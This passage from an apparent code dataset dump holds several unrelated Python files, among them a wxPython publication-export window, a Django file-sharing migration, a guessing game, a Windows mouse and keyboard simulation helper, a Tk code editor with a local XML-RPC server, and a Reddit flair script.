Publicação\", style= wx.SYSTEM_MENU | wx.CAPTION | wx.CLOSE_BOX | wx.CLIP_CHILDREN)\n self.panelGeraArquivo = wx.Panel(self.windowGeraArquivo, wx.ID_ANY)\n\n wx.StaticBox(self.panelGeraArquivo, -1, pos=(0, 0), size=(660, 60))\n\n choicesCompetencias = self.choicesCompetencias\n choicesCompetencias.append(u'Todos')\n self.stGeraArquivoCompetencia = wx.StaticText(self.panelGeraArquivo, -1, u'Publicação', pos=(10, 10), style=wx.ALIGN_LEFT)\n self.cbGeraArquivoCompetencia = wx.ComboBox(self.panelGeraArquivo, -1, pos=(10, 30), size=(250, -1), choices=choicesCompetencias, style=wx.CB_READONLY)\n self.cbGeraArquivoCompetencia.Bind(wx.EVT_COMBOBOX, self.inserePublicacaoPorCompetencia)\n\n self.competenciaAtual = None\n self.itensGeraArquivoListCtrl = []\n self.itensParaArquivosListCtrl = []\n\n wx.StaticText(self.panelGeraArquivo, -1, u'Inserir:', pos=(10, 70))\n self.publicacaoGeraArquivoListCtrl = wx.ListCtrl(self.panelGeraArquivo, wx.ID_ANY, pos=(10, 90), size=(250, 300), style=wx.LC_REPORT)\n self.publicacaoGeraArquivoListCtrl.InsertColumn(0, u'Licitação', width=100)\n self.publicacaoGeraArquivoListCtrl.InsertColumn(1, u'Data Publicação', width=80)\n self.publicacaoGeraArquivoListCtrl.InsertColumn(2, u'Veículo', width=70)\n self.publicacaoGeraArquivoListCtrl.InsertColumn(3, u'', width=0)\n self.publicacaoGeraArquivoListCtrl.Bind(wx.EVT_LIST_ITEM_SELECTED, self.selecionaItensPublicacaoGeraArquivos)\n\n self.btnGeraArquivo = wx.Button(self.panelGeraArquivo, -1, u\">>\", pos=(290, 200))\n self.btnGeraArquivo.Bind(wx.EVT_BUTTON, self.insereGeraArquivo)\n self.btnRemoveGeraArquivo = wx.Button(self.panelGeraArquivo, -1, u\"<<\", pos=(290, 250))\n self.btnRemoveGeraArquivo.Bind(wx.EVT_BUTTON, self.removeGeraArquivo)\n\n wx.StaticText(self.panelGeraArquivo, -1, u'Gerar Arquivo Com:', pos=(400, 70))\n self.publicacaoParaArquivoListCtrl = wx.ListCtrl(self.panelGeraArquivo, wx.ID_ANY, pos=(400, 90), size=(250, 300), style=wx.LC_REPORT)\n self.publicacaoParaArquivoListCtrl.InsertColumn(0, u'Licitação', width=100)\n self.publicacaoParaArquivoListCtrl.InsertColumn(1, u'Data Publicação', width=80)\n self.publicacaoParaArquivoListCtrl.InsertColumn(2, u'Veículo', width=70)\n self.publicacaoParaArquivoListCtrl.InsertColumn(3, u'', width=0)\n self.publicacaoParaArquivoListCtrl.Bind(wx.EVT_LIST_ITEM_SELECTED, self.selecionaItensPublicacaoParaArquivo)\n\n self.btnGerarArquivo = wx.Button(self.panelGeraArquivo, -1, \"Gerar Arquivo\", pos=(300, 400))\n self.btnGerarArquivo.Bind(wx.EVT_BUTTON, self.geraArquivoDialog)\n self.windowGeraArquivo.Bind(wx.EVT_CLOSE, self.quitGeraArquivo)\n\n self.windowGeraArquivo.Centre()\n self.windowGeraArquivo.Show()\n\n def quitGeraArquivo(self, event):\n\n self.toolBarControler(True, True, True, True)\n self.windowGeraArquivo.Destroy()\n\n def inserePublicacaoPorCompetencia(self, event):\n\n publicacoes = []\n if self.competenciaAtual == unicode(self.cbGeraArquivoCompetencia.GetValue()):\n return 0\n\n elif self.cbGeraArquivoCompetencia.GetValue() != u'Todos':\n\n publicacoes = Publicacao.query.filter_by(competencia=self.cbGeraArquivoCompetencia.GetValue()).all()\n else:\n\n publicacoes = Publicacao.query.all()\n\n self.publicacaoGeraArquivoListCtrl.DeleteAllItems()\n\n if not publicacoes:\n self.message = wx.MessageDialog(None, u'Não existe publicações para esta competência!', 'Info', wx.OK)\n self.message.ShowModal()\n\n else:\n\n if len(publicacoes) == self.publicacaoParaArquivoListCtrl.GetItemCount():\n pass\n\n else:\n\n for publicacao in publicacoes:\n igual = False\n if self.publicacaoParaArquivoListCtrl.GetItemCount() == 0:\n index = self.publicacaoGeraArquivoListCtrl.InsertStringItem(sys.maxint, unicode(publicacao.numeroProcesso))\n self.publicacaoGeraArquivoListCtrl.SetStringItem(index, 1, unicode(publicacao.dataPublicacao))\n self.publicacaoGeraArquivoListCtrl.SetStringItem(index, 2, unicode(publicacao.veiculoComunicacao))\n self.publicacaoGeraArquivoListCtrl.SetStringItem(index, 3, unicode(publicacao.id))\n igual = True\n\n else:\n\n for x in range(self.publicacaoParaArquivoListCtrl.GetItemCount()):\n\n if publicacao.numeroProcesso == unicode(self.publicacaoParaArquivoListCtrl.GetItem(x, 0).GetText()) and publicacao.dataPublicacao == unicode(self.publicacaoParaArquivoListCtrl.GetItem(x, 1).GetText()) and publicacao.veiculoComunicacao == unicode(self.publicacaoParaArquivoListCtrl.GetItem(x, 2).GetText()):\n igual = True\n\n if not igual:\n\n index = self.publicacaoGeraArquivoListCtrl.InsertStringItem(sys.maxint, unicode(publicacao.numeroProcesso))\n self.publicacaoGeraArquivoListCtrl.SetStringItem(index, 1, unicode(publicacao.dataPublicacao))\n self.publicacaoGeraArquivoListCtrl.SetStringItem(index, 2, unicode(publicacao.veiculoComunicacao))\n self.publicacaoGeraArquivoListCtrl.SetStringItem(index, 3, unicode(publicacao.id))\n\n self.competenciaAtual = unicode(self.cbGeraArquivoCompetencia.GetValue())\n\n def selecionaItensPublicacaoGeraArquivos(self, event):\n\n item = self.publicacaoGeraArquivoListCtrl.GetFirstSelected()\n self.itensGeraArquivoListCtrl = []\n while item != -1:\n self.itensGeraArquivoListCtrl.append(item)\n item = self.publicacaoGeraArquivoListCtrl.GetNextSelected(item)\n\n def selecionaItensPublicacaoParaArquivo(self, event):\n\n item = self.publicacaoParaArquivoListCtrl.GetFirstSelected()\n self.itensParaArquivosListCtrl = []\n while item != -1:\n self.itensParaArquivosListCtrl.append(item)\n item = self.publicacaoParaArquivoListCtrl.GetNextSelected(item)\n\n def insereGeraArquivo(self, event):\n\n if not self.itensGeraArquivoListCtrl:\n\n self.message = wx.MessageDialog(None, u'Selecione os publicacoes a serem inseridos!', 'Info', wx.OK)\n self.message.ShowModal()\n\n else:\n\n for item in self.itensGeraArquivoListCtrl:\n\n index = self.publicacaoParaArquivoListCtrl.InsertStringItem(sys.maxint, unicode(self.publicacaoGeraArquivoListCtrl.GetItem(item, 0).GetText()))\n self.publicacaoParaArquivoListCtrl.SetStringItem(index, 1, unicode(self.publicacaoGeraArquivoListCtrl.GetItem(item, 1).GetText()))\n self.publicacaoParaArquivoListCtrl.SetStringItem(index, 2, unicode(self.publicacaoGeraArquivoListCtrl.GetItem(item, 2).GetText()))\n self.publicacaoParaArquivoListCtrl.SetStringItem(index, 3, unicode(self.publicacaoGeraArquivoListCtrl.GetItem(item, 3).GetText()))\n\n for item in reversed(self.itensGeraArquivoListCtrl):\n self.publicacaoGeraArquivoListCtrl.DeleteItem(item)\n\n self.itensGeraArquivoListCtrl = []\n\n def removeGeraArquivo(self, event):\n\n if not self.itensParaArquivosListCtrl:\n self.message = wx.MessageDialog(None, u'Selecione os publicacoes a serem removidos!', 'Info', wx.OK)\n self.message.ShowModal()\n else:\n\n for item in self.itensParaArquivosListCtrl:\n\n index = self.publicacaoGeraArquivoListCtrl.InsertStringItem(sys.maxint, unicode(self.publicacaoParaArquivoListCtrl.GetItem(item, 0).GetText()))\n self.publicacaoGeraArquivoListCtrl.SetStringItem(index, 1, unicode(self.publicacaoParaArquivoListCtrl.GetItem(item, 1).GetText()))\n self.publicacaoGeraArquivoListCtrl.SetStringItem(index, 2, unicode(self.publicacaoParaArquivoListCtrl.GetItem(item, 2).GetText()))\n self.publicacaoGeraArquivoListCtrl.SetStringItem(index, 3, unicode(self.publicacaoParaArquivoListCtrl.GetItem(item, 3).GetText()))\n\n for item in reversed(self.itensParaArquivosListCtrl):\n self.publicacaoParaArquivoListCtrl.DeleteItem(item)\n\n self.itensParaArquivosListCtrl = []\n\n def geraArquivoDialog(self, event):\n\n if self.publicacaoParaArquivoListCtrl.GetItemCount() == 0:\n\n self.message = wx.MessageDialog(None, u'Selecione os publicacoes para gerar o arquivo!', 'Info', wx.OK)\n self.message.ShowModal()\n return 0\n else:\n\n dlg = wx.FileDialog(self, message=u\"Salvar \", defaultDir=\"\", defaultFile=\"PUBLICACAO.REM\", wildcard=\"Arquivo de Remessa (*.REM)|*.REM\", style=wx.SAVE)\n if dlg.ShowModal() == wx.ID_OK:\n\n self.path = dlg.GetPath()\n if os.path.exists(self.path):\n\n remove_dial = wx.MessageDialog(None, u'Já existe um arquivo '+dlg.GetFilename()+u\".\\n Deseja substituí-lo?\", 'Sair', wx.YES_NO | wx.NO_DEFAULT | wx.ICON_QUESTION)\n ret = remove_dial.ShowModal()\n if ret == wx.ID_YES:\n\n #VERIFICAR AS DEPENDENCIAS AKI DEPOIS\n #self.message = wx.MessageDialog(None, u'Após criar o arquivo de convênios é necessário gerar o arquivo de Participantes de Convênio!\\n', 'Info', wx.OK | wx.ICON_EXCLAMATION)\n #self.message.ShowModal()\n\n if self.geraArquivo():\n self.message = wx.MessageDialog(None, u'Arquivo de Publicações gerado com sucesso!', 'Info', wx.OK)\n self.message.ShowModal()\n \n else:\n self.message = wx.MessageDialog(None, u'Houve um erro na geração do arquivo!\\nVerifique se você tem permissão de escrita ou se o arquivo já se encontra aberto!', 'Error', wx.OK)\n self.message.ShowModal()\n \n else:\n pass\n\n else:\n if self.geraArquivo():\n self.message = wx.MessageDialog(None, u'Arquivo de Publicações com sucesso!', 'Info', wx.OK)\n self.message.ShowModal()\n \n else:\n self.message = wx.MessageDialog(None, u'Houve um erro na geração do arquivo!\\nVerifique se você tem permiss��o de escrita ou se o arquivo já se encontra aberto!', 'Error', wx.OK)\n self.message.ShowModal()\n \n\n def geraArquivo(self):\n\n f = codecs.open(self.path, \"w\", \"utf-8\")\n\n for x in range(self.publicacaoParaArquivoListCtrl.GetItemCount()):\n\n try:\n\n idEmpenho = int(self.publicacaoParaArquivoListCtrl.GetItem(x, 3).GetText())\n publicacao = Publicacao.query.filter_by(id=idEmpenho).first()\n\n f.write(unicode(publicacao.numeroProcesso.ljust(18).replace(\"'\", \"\").replace(\"\\\"\", \"\")))\n f.write(unicode(self.transformaData(publicacao.dataPublicacao)))\n f.write(unicode(publicacao.veiculoComunicacao).ljust(50).replace(\"'\", \"\").replace(\"\\\"\", \"\"))\n f.write(unicode(u'\\n'))\n\n except:\n return 0\n return 1\n\n def transformaData(self, data):\n\n if data == \" / / \":\n return '00000000'\n else:\n return data[6:]+data[3:5]+data[0:2]\n","sub_path":"WindowPublicacao.py","file_name":"WindowPublicacao.py","file_ext":"py","file_size_in_byte":28776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"281145701","text":"from competitive import Competitive\nfrom cooperative import Cooperative\nimport random\nimport math\nfrom scipy.special import log_softmax, softmax\n\nclass Planner():\n\n def __init__(self, environment, environment2, p_coop=1, p_comp=1):\n max_iter = 1000\n self.competitive_model1 = Competitive(environment, environment2, max_iter)\n self.competitive_model1.train()\n self.competitive_model2 = Competitive(environment2, environment, max_iter)\n self.competitive_model2.train()\n self.cooperative_model1 = Cooperative(environment, max_iter)\n self.cooperative_model1.train()\n self.cooperative_model2 = Cooperative(environment2, max_iter)\n self.cooperative_model2.train()\n self.models1 = [self.cooperative_model1, self.competitive_model1]\n self.models2 = [self.cooperative_model2, self.competitive_model2]\n self.environment1 = environment\n self.environment2 = environment2\n self.p_coop = p_coop\n self.p_comp = p_comp\n\n \"\"\"\n 0: coop\n 1: comp\n \"\"\"\n def infer(self, rounds1, rounds2):\n model2 = self.models2[self.intention(rounds1, self.cooperative_model1, self.competitive_model1)]\n model1 = self.models1[self.intention(rounds2, self.cooperative_model2, self.competitive_model2)]\n\n state = self.environment1.init_state\n while(True):\n a1 = model1.next_move(state)\n a2 = model2.next_move((state[1], state[0]))\n next_states = []\n next_probs = []\n for s in self.environment1.states:\n if (state, a1, a2, s) in self.environment1.transitions:\n next_states.append(s)\n next_probs.append(self.environment1.transitions[(state, a1, a2, s)])\n next_state = random.choices(next_states, next_probs)[0]\n transition = (state, a1, a2, next_state)\n if next_state == self.environment1.END_STATE:\n if transition in self.environment1.collab_state:\n return self.environment1.collab_state[transition]\n else:\n return -100\n state = next_state\n\n \n def intention(self, rounds, coop_model, comp_model):\n if len(rounds) == 0:\n return random.randint(0,1)\n total_coop = 0\n total_comp = 0\n for round in rounds:\n coop = coop_model.step(round) + math.log(self.p_coop)\n comp = comp_model.step(round) + math.log(self.p_comp)\n probs = log_softmax([coop, comp])\n total_coop += probs[0]\n total_comp += probs[1]\n probs = softmax([total_coop, total_comp])\n if random.random() < probs[0]:\n return 0\n else: \n return 1\n\n\n\n\n\n","sub_path":"planner.py","file_name":"planner.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"581824459","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('auth', '0006_require_contenttypes_0002'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='File',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('display_name', models.CharField(max_length=255)),\n ('file_name', models.CharField(unique=True, max_length=32)),\n ('uploaded', models.DateTimeField()),\n ],\n ),\n migrations.CreateModel(\n name='FileOwner',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ],\n ),\n migrations.CreateModel(\n name='GroupMembership',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('joined', models.DateTimeField()),\n ('can_upload', models.BooleanField()),\n ],\n ),\n migrations.CreateModel(\n name='CustomUser',\n fields=[\n ('fileowner_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='file_share.FileOwner')),\n ('password', models.CharField(max_length=128, verbose_name='password')),\n ('last_login', models.DateTimeField(null=True, verbose_name='last login', blank=True)),\n ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),\n ('email', models.EmailField(unique=True, max_length=255)),\n ('first_name', models.CharField(max_length=50, blank=True)),\n ('last_name', models.CharField(max_length=50, blank=True)),\n ('is_active', models.BooleanField(default=False)),\n ('is_staff', models.BooleanField(default=False)),\n ],\n options={\n 'abstract': False,\n },\n bases=('file_share.fileowner', models.Model),\n ),\n migrations.CreateModel(\n name='Group',\n fields=[\n ('fileowner_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='file_share.FileOwner')),\n ('name', models.CharField(max_length=80)),\n ('is_closed', models.BooleanField(default=False)),\n ],\n bases=('file_share.fileowner',),\n ),\n migrations.AddField(\n model_name='groupmembership',\n name='user',\n field=models.ForeignKey(to=settings.AUTH_USER_MODEL),\n ),\n migrations.AddField(\n model_name='file',\n name='recipient',\n field=models.ForeignKey(related_name='received_files', to='file_share.FileOwner'),\n ),\n migrations.AddField(\n model_name='file',\n name='uploaded_by',\n field=models.ForeignKey(related_name='uploaded_files', to=settings.AUTH_USER_MODEL),\n ),\n migrations.AddField(\n model_name='groupmembership',\n name='group',\n field=models.ForeignKey(to='file_share.Group'),\n ),\n migrations.AddField(\n model_name='group',\n name='users',\n field=models.ManyToManyField(to=settings.AUTH_USER_MODEL, through='file_share.GroupMembership'),\n ),\n migrations.AddField(\n model_name='customuser',\n name='groups',\n field=models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Group', blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', verbose_name='groups'),\n ),\n migrations.AddField(\n model_name='customuser',\n name='user_permissions',\n field=models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Permission', blank=True, help_text='Specific permissions for this user.', verbose_name='user permissions'),\n ),\n ]\n","sub_path":"file_share/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"444115786","text":"# Write a Python program to display the examination schedule. (extract the date from exam_st_date).\r\n\r\n'''\r\n\r\nexam_st_date = (11, 12, 2014)\r\nSample Output : The examination will start from : 11 / 12 / 2014\r\n\r\n'''\r\n\r\nexam_st_date = (11, 12, 2014)\r\nlist = list(exam_st_date)\r\n\r\nprint(\"The examination will start from : \", str(list[0]), \" / \", str(list[1]), \" / \", str(list[2]))","sub_path":"ex9.py","file_name":"ex9.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"368813039","text":"import random\n# re为正则校验\nimport re\nguess = input('请输入我脑海中的数字: ')\ntarget = random.randint(1, 20)\nis_first_correct = False\ns = re.findall(r'\\D', guess)\nwhile len(s) != 0:\n guess = input('你妹啊,输入整数好吗: ')\n s = re.findall(r'\\D', guess)\nif int(guess) == target:\n print('恭喜你,猜对啦')\n is_first_correct = True\nwhile int(guess) != target:\n if int(guess) < target:\n print('小了')\n elif int(guess) > target:\n print('大了')\n else:\n print('恭喜你,猜对啦')\n guess = input('重新试试: ')\n s = re.findall(r'\\D', guess)\n while len(s) != 0:\n guess = input('你妹啊,输入整数好吗: ')\n s = re.findall(r'\\D', guess)\nif not is_first_correct:\n print('恭喜你,猜对啦')\nprint('游戏结束,不玩啦~')\n\n","sub_path":"guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"136716012","text":"import win32gui\r\nimport win32con\r\nimport win32api\r\nimport time\r\nfrom ctypes import *\r\n\r\nclass EventsImitater():\r\n def mouse_leftclick(self):#单击\r\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)\r\n # 在当前位置按下鼠标左键\r\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)\r\n # 在当前位置松开鼠标左键\r\n def mouse_rightclick(self):#右键\r\n win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0)\r\n win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0)\r\n def double_click(self):#双击\r\n i = 0\r\n while i <= 1:\r\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)\r\n i += 1\r\n time.sleep(0.05)\r\n def wheel_down(self):#下拉\r\n win32api.mouse_event(win32con.MOUSEEVENTF_WHEEL, 0, 0, 1)\r\n def wheel_up(self):#上滚\r\n win32api.mouse_event(win32con.MOUSEEVENTF_WHEEL, 0, 0, 1)\r\n def read_mouseposition(self):\r\n i = c_int(3)\r\n pi = pointer(i)\r\n win32api.MessageBox(0,str(pi[0])+\"秒后读取鼠标位置!\", \"注意!\", win32con.MB_ICONASTERISK)\r\n for n in range(3, 0, -1):\r\n pi[0] -= 1\r\n print(pi[0])\r\n time.sleep(1)\r\n pos = win32api.GetCursorPos()\r\n win32api.MessageBox(0, str(pos[0])+\",\"+str(pos[1]), \"鼠标位置\", win32con.MB_OK)\r\n return pos\r\n def move_mouse(self,new_x ,new_y):\r\n if new_y is not None and new_x is not None:\r\n point = (new_x, new_y)\r\n win32api.SetCursorPos(point)\r\n self.x = new_x\r\n self.y = new_y\r\n def key_input(self,input_words):\r\n for word in input_words:\r\n win32api.keybd_event(VK_CODE[word], 0, 0, 0)\r\n win32api.keybd_event(VK_CODE[word], 0, win32con.KEYEVENTF_KEYUP, 0)\r\n time.sleep(0.05)\r\n def key_event(self,input_key):\r\n win32api.keybd_event(VK_CODE[word], 0, 0, 0)\r\n win32api.keybd_event(VK_CODE[word], 0, win32con.KEYEVENTF_KEYUP, 0)\r\n time.sleep(1)\r\n# testcode\r\n# test = EventsImitater()\r\n# pos = test.read_mouseposition()\r\n# i = 10\r\n# while i:\r\n# test.move_mouse(pos[0],pos[1])\r\n# i -= 1\r\n# time.sleep(1)\r\n\r\n","sub_path":"PersonalTools.py","file_name":"PersonalTools.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"637234967","text":"# MIT License\n\n# Original work Copyright (c) 2018 François Girault\n# Modified work Copyright 2020 Morten Eek\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\nimport os\nimport model\nimport settings\nimport theme\nimport commands\nimport threading\nimport pickle\nimport sys\nimport tkinter as tk\nfrom commander import Commander\nfrom sidebar import SideBar\nfrom editor import EditorFrame\nfrom statusbar import StatusBar\nfrom xmlrpc.server import SimpleXMLRPCServer\nfrom tkinter import messagebox\nfrom collections import OrderedDict\n\n\nclass App:\n \"\"\"\n Tk Code application : builds the ui and exposes an api for business logic\n like a controller\n \"\"\"\n\n def __init__(self, tmp_dir, port_file, icon_file, python_path, data_dir):\n self.model = model.PWCodeModel() # observable data model\n self.model.add_observer(self)\n self.settings = settings.Settings(self.model)\n self.root = None\n\n self.sidebar = None\n self.notebook = None\n self.statusbar = None\n self.commander = None\n\n self.tmp_dir = tmp_dir\n self.data_dir = data_dir\n self.port_file = port_file\n self.icon_file = icon_file\n self.python_path = python_path\n self.recent_links = OrderedDict()\n\n def build_ui(self):\n \"\"\" builds the user interface \"\"\"\n self.root = root = tk.Tk(className=self.settings.name.lower()) # --> StartupWMClass = pwcode\n root.protocol(\"WM_DELETE_WINDOW\", self.quit_app)\n\n # img = tk.Image('photo', file=self.icon_file) # TODO: Denne virker med tk8.6 men ikke tk8.5\n # img = tk.PhotoImage(self.icon_file)\n\n root.tk.call('wm', 'iconphoto', root._w, tk.PhotoImage(file=self.icon_file))\n\n # root.tk.call('wm','iconphoto',root._w,img)\n # root.iconphoto(False, img)\n\n w = 1400 # width for the Tk root\n h = 900 # height for the Tk root\n ws = root.winfo_screenwidth()\n hs = root.winfo_screenheight()\n\n x = (ws/2) - (w/2)\n y = (hs/2) - (h/2)\n\n root.geometry('%dx%d+%d+%d' % (w, h, x, y))\n # root.option_add( \"*font\", \"gothic\" )\n # root.option_add(\"*Font\", \"Times 20 bold\")\n\n # def_font = tk.font.nametofont(\"TkDefaultFont\")\n # def_font.config(size=16)\n\n self.font = tk.font.nametofont(\"TkDefaultFont\")\n self.font.config(size=10) # WAIT: Gjør denne konfigurerbar. Også brukes av editor, eller fortsatt separat?\n\n style = theme.build_style(self.settings.colors)\n style.theme_use(\"pwcode\")\n\n self.commander = Commander(self)\n\n # WAIT: Lag funksjon som leser ut dette auto fra commands.py\n root.bind(\"\", lambda x: self.run_command('show_commands'))\n root.bind(\"\", lambda x: self.run_command('quit_app'))\n root.bind(\"\", lambda x: self.run_command('open_file'))\n root.bind(\"\", lambda x: self.run_command('open_folder'))\n root.bind(\"\", lambda x: self.run_command('new_file'))\n root.bind(\"\", lambda x: self.run_command('close_file'))\n root.bind(\"\", lambda x: self.run_command('save_file'))\n root.bind(\"\", lambda x: self.run_command('save_file_as'))\n root.bind(\"\", self.perform_ctrl_tab, True)\n\n root.bind(\"\", lambda x: self.run_command('next_tab_in_index'))\n root.bind(\"\", lambda x: self.run_command('next_tab_in_index')) # on keypad\n root.bind(\"\", lambda x: self.run_command('next_tab_in_index')) # on keypad with num lock\n\n root.bind(\"\", lambda x: self.run_command('previous_tab_in_index'))\n root.bind(\"\", lambda x: self.run_command('previous_in_index')) # on keypad\n root.bind(\"\", lambda x: self.run_command('previous_tab_in_index')) # on keypad with num lock\n\n root.bind(\"\", lambda x: self.run_command('increase_text_font'))\n root.bind(\"\", lambda x: self.run_command('decrease_text_font'))\n\n root.bind(\"\", self.perform_ctrl_return, True)\n root.bind_class(\"Text\", \"\", lambda e: None)\n root.bind_class(\"Text\", \"\", lambda e: None)\n root.bind(\"\", lambda x: self.run_command('kill_process'))\n\n root.bind_class(\"Text\", \"\", lambda e: None)\n root.bind_class(\"Text\", \"\", lambda e: None)\n root.bind(\"\", lambda x: self.run_command('toggle_comment'))\n root.bind(\"\", lambda x: self.run_command('toggle_comment')) # WAIT: Denne varianten for Alt-x også?\n\n # horizontal layout for the sidebar to expand / collapse panels\n self.paned = paned = tk.ttk.PanedWindow(root, orient=tk.HORIZONTAL)\n paned.pack(fill=tk.BOTH, expand=1)\n\n self.sidebar = SideBar(paned, self)\n paned.add(self.sidebar)\n\n self.editor_frame = EditorFrame(paned, self)\n paned.add(self.editor_frame)\n\n initial_status = ''\n self.statusbar = StatusBar(root, self, initial_status)\n self.statusbar.pack(fill=tk.X, side=tk.BOTTOM)\n\n def perform_ctrl_tab(self, event=None):\n self.run_command('previous_tab')\n return \"break\"\n\n def perform_ctrl_return(self, event=None):\n self.run_command('run_file')\n return \"break\"\n\n def quit_app(self):\n \"\"\" Exit program \"\"\"\n unsaved = False\n for tab_id in self.editor_frame.notebook.tabs():\n if '!hometab' not in str(tab_id):\n file_obj = self.editor_frame.id2path[tab_id]\n if file_obj.path in self.recent_links.keys():\n del self.recent_links[file_obj.path]\n self.recent_links.update({file_obj.path: file_obj})\n\n text_editor = self.editor_frame.notebook.nametowidget(tab_id)\n if text_editor.modified and not unsaved:\n unsaved = True\n\n if unsaved:\n confirm = messagebox.askyesno(\n message='You have unsaved changes. Are you sure you want to quit?',\n icon='question',\n title='Confirm Quit'\n )\n\n if unsaved and not confirm:\n return\n\n if os.path.exists(self.port_file):\n os.remove(self.port_file)\n\n for r, d, f in os.walk(self.tmp_dir):\n for file in f:\n path = self.tmp_dir + '/' + file\n if 'Untitled-' in file and os.path.getsize(path) == 0:\n os.remove(path)\n\n self.root.destroy()\n pickle.dump(self.recent_links, open(self.tmp_dir + \"/recent_files.p\", \"wb\"))\n\n def run(self, port):\n \"\"\" launch application and server \"\"\"\n threading.Thread(target=self.start_rcp_server, args=(port,), daemon=True).start()\n\n if not self.root:\n self.build_ui()\n self.root.mainloop()\n\n def focus(self):\n \"\"\" Focus existing frame \"\"\"\n self.root.wm_state('iconic')\n self.root.wm_state('normal')\n\n def start_rcp_server(self, port):\n server = SimpleXMLRPCServer(('localhost', int(port)), logRequests=False, allow_none=True)\n server.register_instance(self)\n server.serve_forever()\n\n def after(self, delay, command):\n \"\"\" proxy method to Tk.after() \"\"\"\n self.root.after(delay, command)\n\n def on_file_selected(self, file_obj):\n \"\"\" callback on file selection : set the window title \"\"\"\n base_title = ''\n if file_obj:\n if file_obj.path.startswith(self.tmp_dir + '/Untitled-'):\n base_title = file_obj.basename + ' - '\n else:\n base_title = file_obj.path + ' - '\n\n self.root.title(base_title + self.settings.name)\n\n def command_callable(self, name):\n \"\"\"create a callable of a command \"\"\"\n\n def _callback(*args, **kwargs):\n self.commander.run(name, *args, **kwargs)\n\n return _callback\n\n def run_command(self, name, *args, **kwargs):\n self.commander.run(name, *args, **kwargs)\n\n def select_file(self, file_obj, originator):\n \"\"\" set a file as selected \"\"\"\n self.model.set_current_file(file_obj, originator)\n","sub_path":"bin/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"425937230","text":"import praw\ndef processWikipage(reddit):\n wikiPage = reddit.subreddit('OpTicGaming').wiki['verification'].content_md\n lines = wikiPage.split(\"\\n\")\n users = []\n for line in lines:\n users.append(line.split(\",\"))\n return users\ndef generateFlairs(users):\n userFlairs = []\n for user in users:\n userFlair = {}\n userFlair['user'] = user[0].strip()\n flair = \":checkmark: {name} - {role}\".format(name = user[1].strip(), role = user[2].strip())\n userFlair['flair_text'] = flair\n userFlairs.append(userFlair)\n return userFlairs\ndef assignFlairs(flairs, reddit):\n css = 'verify'\n reddit.subreddit('OpTicGaming').flair.update(flair_list = flairs, css_class = css)\ndef main(reddit):\n users = processWikipage(reddit)\n flairs = generateFlairs(users)\n assignFlairs(flairs, reddit)","sub_path":"verification.py","file_name":"verification.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"529917135","text":"\n\nfrom xai.brain.wordbase.nouns._halberd import _HALBERD\n\n#calss header\nclass _HALBERDS(_HALBERD, ):\n\tdef __init__(self,): \n\t\t_HALBERD.__init__(self)\n\t\tself.name = \"HALBERDS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"halberd\"\n\t\tself.jsondata = 